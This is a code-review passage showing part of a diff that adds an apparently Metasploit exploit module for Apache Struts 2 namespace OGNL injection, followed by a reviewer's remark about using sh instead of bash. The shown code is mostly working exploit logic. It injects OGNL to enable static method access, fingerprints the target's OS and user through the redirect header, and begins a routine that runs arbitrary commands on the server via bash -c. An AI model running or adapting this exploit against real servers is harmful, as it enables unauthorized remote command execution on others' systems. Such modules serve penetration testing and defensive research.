modules/exploits/multi/http/struts2_namespace_ognl.rb

```diff
@@ -0,0 +1,337 @@
+      else
+        print_error("                       #{pre[1..-2]}")
+      end
+    end
+=end
+
+    resp
+  end
+
+  def profile_target
+    # Use OGNL to extract properties from the Java environment
+
+    properties = { 'os.name': nil,          # e.g. 'Linux'
+                   'os.arch': nil,          # e.g. 'amd64'
+                   'os.version': nil,       # e.g. '4.4.0-112-generic'
+                   'user.name': nil,        # e.g. 'root'
+                   #'user.home': nil,       # e.g. '/root' (didn't work in testing)
+                   'user.language': nil,    # e.g. 'en'
+                   #'java.io.tmpdir': nil,  # e.g. '/usr/local/tomcat/temp' (didn't work in testing)
+                   }
+
+    ognl =  "(#_memberAccess['allowStaticMethodAccess']=true).('#{rand_text_alpha(2)}')"
+    properties.each do |k,v|
+      ognl << "+(@java.lang.System@getProperty('#{k}'))+':'"
+    end
+    ognl = ognl[0...-4]
+
+    r = send_struts_request(ognl)
+
+    if r && r.code == 302 && r.headers['Location']
+      # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'
+      #   Extract the OGNL output from the Location path, and strip the two random chars
+      s = r.headers['Location'].split('/')[1][2..-1]
+
+      # Confirm that all fields were returned, and non include extra (:) delimiters
+      #   If the OGNL fails, we might get a partial result back, in which case, we'll abort.
+      if s.count(':') > properties.length
+        print_error("Failed to profile target.  Response from server: #{r.to_s}")
+        fail_with(Failure::UnexpectedReply,"Target responded with unexpected profiling data")
+      end
+      
+      # Separate the colon-delimited properties and store in the 'properties' hash
+      s = s.split(':')
+      i = 0
+      properties.each do |k,v|
+        properties[k] = s[i]
+        i += 1
+      end
+
+      print_good("Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}" +
+        " #{properties[:'os.arch']}, running as #{properties[:'user.name']}")
+      return properties
+    else
+      print_error("Failed to profile target.  Response from server: #{r.to_s}")
+      fail_with(Failure::UnexpectedReply, 'Server did not respond properly to profiling attempt.')
+    end
+  end
+
+  def execute_command(cmd_input, opts={})    # WTF is opts for?
+    # Semicolons appear to be a bad character in OGNL.  cmdstager doesn't understand that.
+    #   We'll replace ';' with '||' and hope for the best
+
+    if (cmd_input.include?';')
+      print_error("WARNING: Command contains bad characters: semicolons (;).  Substituting '||'")
+      vprint_status("BEFORE: #{cmd_input}")
+      cmd_input = cmd_input.gsub(";" ,"||")
+      vprint_status("AFTER: #{cmd_input}")
+    end
+
+    properties = profile_target
+    
+    os = properties[:'os.name'].downcase
+    if os.include?'linux' or os.include?'nix'
+      cmd = "{'bash','-c','#{cmd_input}'}"
```

Comment:
I don't think you can be certain `bash` is installed on all Unix systems. I can run Struts on innumerable platforms due to Java. `sh` is preferred unless you need specific bashisms.